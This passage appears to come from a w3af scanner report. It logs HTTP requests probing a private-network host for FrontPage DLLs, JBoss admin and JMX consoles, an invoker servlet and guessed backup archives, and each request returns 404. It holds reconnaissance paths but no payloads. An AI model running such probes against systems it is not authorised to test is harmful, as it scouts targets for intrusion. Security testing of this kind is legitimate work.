                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_bin/_vti_aut/author.dll&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="172">
                <http-request>
                    <status>GET http://10.12.68.43:31337/robots.txt HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/robots.txt&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="203">
                <http-request>
                    <status>GET http://10.12.68.43:31337/admin-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about admin-console/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='admin-console/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="205">
                <http-request>
                    <status>GET http://10.12.68.43:31337/jmx-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about jmx-console/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='jmx-console/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="207">
                <http-request>
                    <status>GET http://10.12.68.43:31337/status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about status has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='status'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="208">
                <http-request>
                    <status>GET http://10.12.68.43:31337/web-console/ServerInfo.jsp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/web-console/ServerInfo.jsp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="209">
                <http-request>
                    <status>GET http://10.12.68.43:31337/WebConsole/Invoker HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about WebConsole/Invoker has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='WebConsole/Invoker'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="211">
                <http-request>
                    <status>GET http://10.12.68.43:31337/invoker/JMXInvokerServlet HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about invoker/JMXInvokerServlet has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='invoker/JMXInvokerServlet'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="213">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="214">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="215">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="216">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="217">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="218">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="219">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="220">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="222">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="224">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="225">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="226">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="227">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="228">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="229">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
